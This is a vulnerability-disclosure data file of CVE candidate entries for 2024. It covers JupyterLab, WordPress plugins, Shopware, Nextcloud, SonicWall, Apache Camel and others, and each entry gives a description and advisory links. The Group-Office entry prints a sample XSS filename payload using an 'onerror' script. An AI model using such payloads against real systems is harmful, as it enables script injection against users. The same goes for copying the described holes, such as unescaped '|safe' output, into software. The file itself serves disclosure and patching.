CVE    2024    22421    Candidate    JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. JupyterLab versions 4.1.0b2, 4.0.11, and 3.6.7 are patched. No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix.    FEDORA:FEDORA-2024-1673c2696e   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQJKNRDRFMKGVRIYNNN6CKMNJDNYWO2H/   |   MISC:https://github.com/jupyterlab/jupyterlab/commit/19bd9b96cb2e77170a67e43121637d0b5619e8c6   |   URL:https://github.com/jupyterlab/jupyterlab/commit/19bd9b96cb2e77170a67e43121637d0b5619e8c6   |   MISC:https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-44cc-43rp-5947   |   URL:https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-44cc-43rp-5947    Assigned (20240110)
CVE    2024    22420    Candidate    JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab version 4.0.11 has been patched. Users are advised to upgrade. Users unable to upgrade should disable the table of contents extension.    FEDORA:FEDORA-2024-1673c2696e   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQJKNRDRFMKGVRIYNNN6CKMNJDNYWO2H/   |   MISC:https://github.com/jupyterlab/jupyterlab/commit/e1b3aabab603878e46add445a3114e838411d2df   |   URL:https://github.com/jupyterlab/jupyterlab/commit/e1b3aabab603878e46add445a3114e838411d2df   |   MISC:https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-4m77-cmpx-vjc4   |   URL:https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-4m77-cmpx-vjc4    Assigned (20240110)
CVE    2024    2242    Candidate    The Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘active-tab’ parameter in all versions up to, and including, 5.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3049594/contact-form-7/trunk/admin/edit-contact-form.php   |   URL:https://plugins.trac.wordpress.org/changeset/3049594/contact-form-7/trunk/admin/edit-contact-form.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d5bf4972-424a-4470-a0bc-7dcc95378e0e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d5bf4972-424a-4470-a0bc-7dcc95378e0e?source=cve    Assigned (20240306)
CVE    2024    22419    Candidate    Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. The `concat` built-in can write over the bounds of the memory buffer that was allocated for it and thus overwrite existing valid data. The root cause is that the `build_IR` for `concat` doesn't properly adhere to the API of copy functions (for `>=0.3.2` the `copy_bytes` function). A contract search was performed and no vulnerable contracts were found in production. The buffer overflow can result in the change of semantics of the contract. The overflow is length-dependent and thus it might go unnoticed during contract testing. However, certainly not all usages of concat will result in overwritten valid data as we require it to be in an internal function and close to the return statement where other memory allocations don't occur. This issue has been addressed in commit `55e18f6d1` which will be included in future releases. Users are advised to update when possible.    MISC:https://github.com/vyperlang/vyper/commit/55e18f6d128b2da8986adbbcccf1cd59a4b9ad6f   |   URL:https://github.com/vyperlang/vyper/commit/55e18f6d128b2da8986adbbcccf1cd59a4b9ad6f   |   MISC:https://github.com/vyperlang/vyper/issues/3737   |   URL:https://github.com/vyperlang/vyper/issues/3737   |   MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-2q8v-3gqq-4f8p   |   URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-2q8v-3gqq-4f8p    Assigned (20240110)
CVE    2024    22418    Candidate    Group-Office is an enterprise CRM and groupware tool. Affected versions are subject to a vulnerability which is present in the file upload mechanism of Group Office. It allows an attacker to execute arbitrary JavaScript code by embedding it within a file's name. For instance, using a filename such as “><img src=x onerror=prompt('XSS')>.jpg” triggers the vulnerability. When this file is uploaded, the JavaScript code within the filename is executed. This issue has been addressed in version 6.8.29. All users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/Intermesh/groupoffice/commit/2a52a5d42d080db6738d70eba30294bcd94ebd09   |   URL:https://github.com/Intermesh/groupoffice/commit/2a52a5d42d080db6738d70eba30294bcd94ebd09   |   MISC:https://github.com/Intermesh/groupoffice/security/advisories/GHSA-p7w9-h6c3-wqpp   |   URL:https://github.com/Intermesh/groupoffice/security/advisories/GHSA-p7w9-h6c3-wqpp    Assigned (20240110)
CVE    2024    22417    Candidate    Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a `GET` request on lines 339-343 in `request.py`. The returned contents of the URL are then passed to and reflected back to the user in the `send_file` function on line 484, together with the user-controlled `src_type`, which allows the attacker to control the HTTP response content type leading to a cross-site scripting vulnerability. An attacker could craft a special URL to point to a malicious website and send the link to a victim. The fact that the link would contain a trusted domain (e.g. from one of the public Whoogle instances) could be used to trick the user into clicking the link. The malicious website could, for example, be a copy of a real website, meant to steal a person’s credentials to the website, or trick that person in another way. Version 0.8.4 contains a patch for this issue.    MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L465-L490   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L465-L490   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L466   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L466   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L476   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L476   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479   |   MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L484C6-L484C7   |   URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L484C6-L484C7   |   MISC:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda   |   URL:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda   |   MISC:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/   |   URL:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/    Assigned (20240110)
CVE    2024    22416    Candidate    pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.    MISC:https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e   |   URL:https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e   |   MISC:https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc   |   URL:https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc   |   MISC:https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm   |   URL:https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm    Assigned (20240110)
CVE    2024    22415    Candidate    jupyter-lsp is a coding assistance tool for JupyterLab (code navigation + hover suggestions + linters + autocompletion + rename) using Language Server Protocol. Installations of jupyter-lsp running in environments without configured file system access control (on the operating system level), and with jupyter-server instances exposed to non-trusted network are vulnerable to unauthorised access and modification of file system beyond the jupyter root directory. This issue has been patched in version 2.2.2 and all users are advised to upgrade. Users unable to upgrade should uninstall jupyter-lsp.    MISC:https://github.com/jupyter-lsp/jupyterlab-lsp/commit/4ad12f204ad0b85580fc32137c647baaff044e95   |   URL:https://github.com/jupyter-lsp/jupyterlab-lsp/commit/4ad12f204ad0b85580fc32137c647baaff044e95   |   MISC:https://github.com/jupyter-lsp/jupyterlab-lsp/security/advisories/GHSA-4qhp-652w-c22x   |   URL:https://github.com/jupyter-lsp/jupyterlab-lsp/security/advisories/GHSA-4qhp-652w-c22x    Assigned (20240110)
CVE    2024    22414    Candidate    flaskBlog is a simple blog app built with Flask. Improper storage and rendering of the `/user/<user>` page allows a user's comments to execute arbitrary JavaScript code. The HTML template `user.html` contains the following code snippet to render comments made by a user: `<div class="content" tag="content">{{comment[2]|safe}}</div>`. Use of the "safe" tag causes Flask to _not_ escape the rendered content. To remediate this, simply remove the `|safe` tag from the HTML above. No fix is available and users are advised to manually edit their installation.    MISC:https://github.com/DogukanUrker/flaskBlog/security/advisories/GHSA-mrcw-j96f-p6v6   |   URL:https://github.com/DogukanUrker/flaskBlog/security/advisories/GHSA-mrcw-j96f-p6v6    Assigned (20240110)
CVE    2024    22412    Candidate    ClickHouse is an open-source column-oriented database management system. A bug exists in the cloud ClickHouse offering prior to version 24.0.2.54535 and in github.com/clickhouse/clickhouse version 23.1. Query caching bypasses the role based access controls and the policies being enforced on roles. In affected versions, the query cache only respects separate users, however this is not documented and not expected behavior. People relying on ClickHouse roles can have their access control lists bypassed if they are using query caching. Attackers who have control of a role could guess queries and see data they shouldn't have access to. Version 24.1 of ClickHouse and version 24.0.2.54535 of ClickHouse Cloud contain a patch for this issue. Based on the documentation, role based access control should be enforced regardless if query caching is enabled or not.    MISC:https://github.com/ClickHouse/ClickHouse/blob/bd17ee769e337906c4b1f404861e042ad72fcbfc/src/Interpreters/executeQuery.cpp#L1013-L1015   |   URL:https://github.com/ClickHouse/ClickHouse/blob/bd17ee769e337906c4b1f404861e042ad72fcbfc/src/Interpreters/executeQuery.cpp#L1013-L1015   |   MISC:https://github.com/ClickHouse/ClickHouse/pull/58611   |   URL:https://github.com/ClickHouse/ClickHouse/pull/58611   |   MISC:https://github.com/ClickHouse/ClickHouse/security/advisories/GHSA-45h5-f7g3-gr8r   |   URL:https://github.com/ClickHouse/ClickHouse/security/advisories/GHSA-45h5-f7g3-gr8r    Assigned (20240110)
CVE    2024    22411    Candidate    Avo is a framework to create admin panels for Ruby on Rails apps. In Avo 3 pre12, any HTML inside text that is passed to `error` or `succeed` in an `Avo::BaseAction` subclass will be rendered directly without sanitization in the toast/notification that appears in the UI on Action completion. A malicious user could exploit this vulnerability to trigger a cross site scripting attack on an unsuspecting user. This issue has been addressed in the 3.3.0 and 2.47.0 releases of Avo. Users are advised to upgrade.    MISC:https://github.com/avo-hq/avo/commit/51bb80b181cd8e31744bdc4e7f9b501c81172347   |   URL:https://github.com/avo-hq/avo/commit/51bb80b181cd8e31744bdc4e7f9b501c81172347   |   MISC:https://github.com/avo-hq/avo/commit/fc92a05a8556b1787c8694643286a1afa6a71258   |   URL:https://github.com/avo-hq/avo/commit/fc92a05a8556b1787c8694643286a1afa6a71258   |   MISC:https://github.com/avo-hq/avo/releases/tag/v2.47.0   |   URL:https://github.com/avo-hq/avo/releases/tag/v2.47.0   |   MISC:https://github.com/avo-hq/avo/releases/tag/v3.3.0   |   URL:https://github.com/avo-hq/avo/releases/tag/v3.3.0   |   MISC:https://github.com/avo-hq/avo/security/advisories/GHSA-g8vp-2v5p-9qfh   |   URL:https://github.com/avo-hq/avo/security/advisories/GHSA-g8vp-2v5p-9qfh    Assigned (20240110)
CVE    2024    22410    Candidate    Creditcoin is a network that enables cross-blockchain credit transactions. The Windows binary of the Creditcoin node loads a suite of DLLs provided by Microsoft at startup. If a malicious user has access to overwrite the program files directory it is possible to replace these DLLs and execute arbitrary code. It is the view of the blockchain development team that the threat posed by a hypothetical binary planting attack is minimal and represents a low-security risk. The vulnerable DLL files are from the Windows networking subsystem, the Visual C++ runtime, and low-level cryptographic primitives. Collectively these dependencies are required for a large ecosystem of applications, ranging from enterprise-level security applications to game engines, and don’t represent a fundamental lack of security or oversight in the design and implementation of Creditcoin. The blockchain team takes the stance that running Creditcoin on Windows is officially unsupported and at best should be thought of as experimental.    MISC:https://github.com/gluwa/creditcoin/security/advisories/GHSA-cx5c-xwcv-vhmq   |   URL:https://github.com/gluwa/creditcoin/security/advisories/GHSA-cx5c-xwcv-vhmq   |   MISC:https://owasp.org/www-community/attacks/Binary_planting   |   URL:https://owasp.org/www-community/attacks/Binary_planting    Assigned (20240110)
CVE    2024    2241    Candidate    Improper access control in the user interface in Devolutions Workspace 2024.1.0 and earlier allows an authenticated user to perform unintended actions via specific permissions.    MISC:https://devolutions.net/security/advisories/DEVO-2024-0003   |   URL:https://devolutions.net/security/advisories/DEVO-2024-0003    Assigned (20240306)
CVE    2024    22409    Candidate    DataHub is an open-source metadata platform. In affected versions a low privileged user could remove a user, edit group members, or edit another user's profile information. The default privileges gave too many broad permissions to low privileged users. These have been constrained in PR #9067 to prevent abuse. This issue can result in privilege escalation for lower privileged users up to admin privileges, potentially, if a group with admin privileges exists. May not impact instances that have modified default privileges. This issue has been addressed in datahub version 0.12.1. Users are advised to upgrade.    MISC:https://github.com/datahub-project/datahub/pull/9067   |   URL:https://github.com/datahub-project/datahub/pull/9067   |   MISC:https://github.com/datahub-project/datahub/security/advisories/GHSA-x3v6-r479-m4xv   |   URL:https://github.com/datahub-project/datahub/security/advisories/GHSA-x3v6-r479-m4xv    Assigned (20240110)
CVE    2024    22408    Candidate    Shopware is an open headless commerce platform. The implemented Flow Builder functionality in the Shopware application does not adequately validate the URL used when creating the “call webhook” action. This enables malicious users to perform web requests to internal hosts. This issue has been fixed in the Commercial Plugin release 6.5.7.4 or with the Security Plugin. For installations with Shopware 6.4 the Security plugin is recommended to be installed and up to date. For older versions of 6.4 and 6.5 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.    MISC:https://github.com/shopware/shopware/security/advisories/GHSA-3535-m8vh-vrmw   |   URL:https://github.com/shopware/shopware/security/advisories/GHSA-3535-m8vh-vrmw    Assigned (20240110)
CVE    2024    22407    Candidate    Shopware is an open headless commerce platform. In the Shopware CMS, the state handler for orders fails to sufficiently verify user authorizations for actions that modify the payment, delivery, and/or order status. Due to this inadequate implementation, users lacking 'write' permissions for orders are still able to change the order state. This issue has been addressed and users are advised to update to Shopware 6.5.7.4. For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.    MISC:https://github.com/shopware/shopware/security/advisories/GHSA-3867-jc5c-66qf   |   URL:https://github.com/shopware/shopware/security/advisories/GHSA-3867-jc5c-66qf    Assigned (20240110)
CVE    2024    22406    Candidate    Shopware is an open headless commerce platform. The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the “aggregations” object. The ‘name’ field in this “aggregations” object is vulnerable to SQL injection and can be exploited using time-based SQL queries. This issue has been addressed and users are advised to update to Shopware 6.5.7.4. For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.    MISC:https://github.com/shopware/shopware/security/advisories/GHSA-qmp9-2xwj-m6m9   |   URL:https://github.com/shopware/shopware/security/advisories/GHSA-qmp9-2xwj-m6m9    Assigned (20240110)
CVE    2024    22404    Candidate    Nextcloud files Zip app is a tool to create zip archives from one or multiple files from within Nextcloud. In affected versions users can download "view-only" files by zipping the complete folder. It is recommended that the Files ZIP app is upgraded to 1.2.1, 1.4.1, or 1.5.0. Users unable to upgrade should disable the file zip app.    MISC:https://github.com/nextcloud/files_zip/commit/43204539d517a13e945b90652718e2a213f46820   |   URL:https://github.com/nextcloud/files_zip/commit/43204539d517a13e945b90652718e2a213f46820   |   MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-vhj3-mch4-67fq   |   URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-vhj3-mch4-67fq   |   MISC:https://hackerone.com/reports/2247457   |   URL:https://hackerone.com/reports/2247457    Assigned (20240110)
CVE    2024    22403    Candidate    Nextcloud server is a self hosted personal cloud system. In affected versions OAuth codes did not expire. When an attacker would get access to an authorization code they could authenticate at any time using the code. As of version 28.0.0 OAuth codes are invalidated after 10 minutes and will no longer be authenticated. To exploit this vulnerability an attacker would need to intercept an OAuth code from a user session. It is recommended that the Nextcloud Server is upgraded to 28.0.0. There are no known workarounds for this vulnerability.    MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wppc-f5g8-vx36   |   URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wppc-f5g8-vx36   |   MISC:https://github.com/nextcloud/server/pull/40766   |   URL:https://github.com/nextcloud/server/pull/40766   |   MISC:https://hackerone.com/reports/1784162   |   URL:https://hackerone.com/reports/1784162    Assigned (20240110)
CVE    2024    22402    Candidate    Nextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users were able to load the first page of apps they were actually not allowed to access. Depending on the selection of apps installed this may present a permissions bypass. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability.    MISC:https://github.com/nextcloud/guests/pull/1082   |   URL:https://github.com/nextcloud/guests/pull/1082   |   MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-v3qw-7vgv-2fxj   |   URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-v3qw-7vgv-2fxj   |   MISC:https://hackerone.com/reports/2251074   |   URL:https://hackerone.com/reports/2251074    Assigned (20240110)
CVE    2024    22401    Candidate    Nextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users could change the allowed list of apps, allowing them to use apps that were not intended to be used. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability.    MISC:https://github.com/nextcloud/guests/pull/1082   |   URL:https://github.com/nextcloud/guests/pull/1082   |   MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wr87-hx3w-29hh   |   URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wr87-hx3w-29hh   |   MISC:https://hackerone.com/reports/2250398   |   URL:https://hackerone.com/reports/2250398    Assigned (20240110)
CVE    2024    22400    Candidate    Nextcloud User Saml is an app for authenticating Nextcloud users using SAML. In affected versions users can be given a link to the Nextcloud server and end up on an uncontrolled third-party server. It is recommended that the User Saml app is upgraded to version 5.1.5, 5.2.5, or 6.0.1. There are no known workarounds for this issue.    MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-622q-xhfr-xmv7   |   URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-622q-xhfr-xmv7   |   MISC:https://github.com/nextcloud/user_saml/commit/b184304a476deeba36e92b70562d5de7c2f85f8a   |   URL:https://github.com/nextcloud/user_saml/commit/b184304a476deeba36e92b70562d5de7c2f85f8a   |   MISC:https://github.com/nextcloud/user_saml/pull/788   |   URL:https://github.com/nextcloud/user_saml/pull/788   |   MISC:https://hackerone.com/reports/2263044   |   URL:https://hackerone.com/reports/2263044    Assigned (20240110)
CVE    2024    22398    Candidate    An improper Limitation of a Pathname to a Restricted Directory (Path Traversal) vulnerability in SonicWall Email Security Appliance could allow a remote attacker with administrative privileges to conduct a directory traversal attack and delete arbitrary files from the appliance file system.    MISC:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0006   |   URL:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0006    Assigned (20240110)
CVE    2024    22397    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in the SonicOS SSLVPN portal allows a remote authenticated attacker as a firewall 'admin' user to store and execute arbitrary JavaScript code.    MISC:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0005   |   URL:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0005    Assigned (20240110)
CVE    2024    22396    Candidate    An Integer-based buffer overflow vulnerability in the SonicOS via IPSec allows a remote attacker in specific conditions to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a specially crafted IKEv2 payload.    MISC:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0004   |   URL:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0004    Assigned (20240110)
CVE    2024    22395    Candidate    Improper access control vulnerability has been identified in the SMA100 SSL-VPN virtual office portal, which in specific conditions could potentially enable a remote authenticated attacker to associate another user's MFA mobile application.    MISC:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0001   |   URL:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0001    Assigned (20240110)
CVE    2024    22394    Candidate    An improper authentication vulnerability has been identified in SonicWall SonicOS SSL-VPN feature, which in specific conditions could allow a remote attacker to bypass authentication. This issue affects only firmware version SonicOS 7.1.1-7040.    MISC:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0003   |   URL:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0003    Assigned (20240110)
CVE    2024    22393    Candidate    Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer. This issue affects Apache Answer: through 1.2.1. A Pixel Flood Attack, carried out by uploading large pixel files, will cause the server to run out of memory. A logged-in user can cause such an attack by uploading an image when posting content. Users are recommended to upgrade to version [1.2.5], which fixes the issue.    MISC:https://lists.apache.org/thread/f58l6dr4r74hl6o71gn47kmn44vw12cv   |   URL:https://lists.apache.org/thread/f58l6dr4r74hl6o71gn47kmn44vw12cv   |   MLIST:[oss-security] 20240222 CVE-2024-22393: Apache Answer: Pixel Flood Attack by uploading the large pixel file   |   URL:http://www.openwall.com/lists/oss-security/2024/02/22/1    Assigned (20240110)
CVE    2024    2239    Candidate    The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Premium Magic Scroll module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://premiumaddons.com/change-log/   |   URL:https://premiumaddons.com/change-log/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/254f3a1c-0d5d-499b-9da7-129f21ba70af?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/254f3a1c-0d5d-499b-9da7-129f21ba70af?source=cve    Assigned (20240306)
CVE    2024    22389    Candidate    When BIG-IP is deployed in high availability (HA) and an iControl REST API token is updated, the change does not sync to the peer device. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.    MISC:https://my.f5.com/manage/s/article/K32544615   |   URL:https://my.f5.com/manage/s/article/K32544615    Assigned (20240201)
CVE    2024    22388    Candidate    Certain configuration available in the communication channel for encoders could expose sensitive data when reader configuration cards are programmed. This data could include credential and device administration keys.    MISC:https://support.hidglobal.com/   |   URL:https://support.hidglobal.com/   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-01    Assigned (20240125)
CVE    2024    22386    Candidate    A race condition was found in the Linux kernel's drm/exynos device driver in exynos_drm_crtc_atomic_disable() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.    MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=8147   |   URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=8147    Assigned (20240115)
CVE    2024    22383    Candidate    Missing release of resource after effective lifetime (CWE-772) in the Controller 7000 resulted in HBUS connected T-Series readers to not automatically recover after coming under attack over the RS-485 interface, resulting in a persistent denial of service. This issue affects: All variants of the Gallagher Controller 7000 9.00 prior to vCR9.00.231204b (distributed in 9.00.1507(MR1)), 8.90 prior to vCR8.90.240209b (distributed in 8.90.1751 (MR3)), 8.80 prior to vCR8.80.240209a (distributed in 8.80.1526 (MR4)), 8.70 prior to vCR8.70.240209a (distributed in 8.70.2526 (MR6)).    MISC:https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2024-22383   |   URL:https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2024-22383    Assigned (20240205)
CVE    2024    22380    Candidate    Electronic Delivery Check System (Ministry of Agriculture, Forestry and Fisheries The Agriculture and Rural Development Project Version) March, Heisei 31 era edition Ver.14.0.001.002 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.    MISC:https://jvn.jp/en/jp/JVN01434915/   |   URL:https://jvn.jp/en/jp/JVN01434915/   |   MISC:https://www.maff.go.jp/j/nousin/seko/nouhin_youryou/densi.html   |   URL:https://www.maff.go.jp/j/nousin/seko/nouhin_youryou/densi.html    Assigned (20240112)
CVE    2024    2238    Candidate    The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Mouse Cursor module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://premiumaddons.com/change-log/   |   URL:https://premiumaddons.com/change-log/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/82e5fd9f-9a1f-4a4c-ac06-61bf65e3c8ab?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/82e5fd9f-9a1f-4a4c-ac06-61bf65e3c8ab?source=cve    Assigned (20240306)
CVE    2024    22372    Candidate    OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product. Affected products and versions are as follows: WRC-X1800GS-B v1.17 and earlier, WRC-X1800GSA-B v1.17 and earlier, WRC-X1800GSH-B v1.17 and earlier, WRC-X6000XS-G v1.09, and WRC-X6000XST-G v1.12 and earlier.    MISC:https://jvn.jp/en/vu/JVNVU90908488/   |   URL:https://jvn.jp/en/vu/JVNVU90908488/   |   MISC:https://www.elecom.co.jp/news/security/20240123-01/   |   URL:https://www.elecom.co.jp/news/security/20240123-01/    Assigned (20240110)
CVE    2024    22371    Candidate    Exposure of sensitive data by crafting a malicious EventFactory and providing a custom ExchangeCreatedEvent that exposes sensitive data. Vulnerability in Apache Camel. This issue affects Apache Camel: from 3.21.X through 3.21.3, from 3.22.X through 3.22.0, from 4.0.X through 4.0.3, from 4.X through 4.3.0. Users are recommended to upgrade to version 3.21.4, 3.22.1, 4.0.4 or 4.4.0, which fixes the issue.    MISC:https://camel.apache.org/security/CVE-2024-22371.html   |   URL:https://camel.apache.org/security/CVE-2024-22371.html    Assigned (20240109)
CVE    2024    22370    Candidate    In JetBrains YouTrack before 2023.3.22666 stored XSS via markdown was possible    MISC:https://www.jetbrains.com/privacy-security/issues-fixed/   |   URL:https://www.jetbrains.com/privacy-security/issues-fixed/    Assigned (20240109)
CVE    2024    2237    Candidate    The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Global Badge module in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://premiumaddons.com/change-log/   |   URL:https://premiumaddons.com/change-log/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/35151561-6a80-4c2c-b87a-2dfe02aa6158?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/35151561-6a80-4c2c-b87a-2dfe02aa6158?source=cve    Assigned (20240306)
CVE    2024    22369    Candidate    Deserialization of Untrusted Data vulnerability in Apache Camel SQL Component. This issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0. Users are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1.    MISC:https://lists.apache.org/thread/3dko781dy2gy5l3fs48p56fgp429yb0f   |   URL:https://lists.apache.org/thread/3dko781dy2gy5l3fs48p56fgp429yb0f    Assigned (20240109)
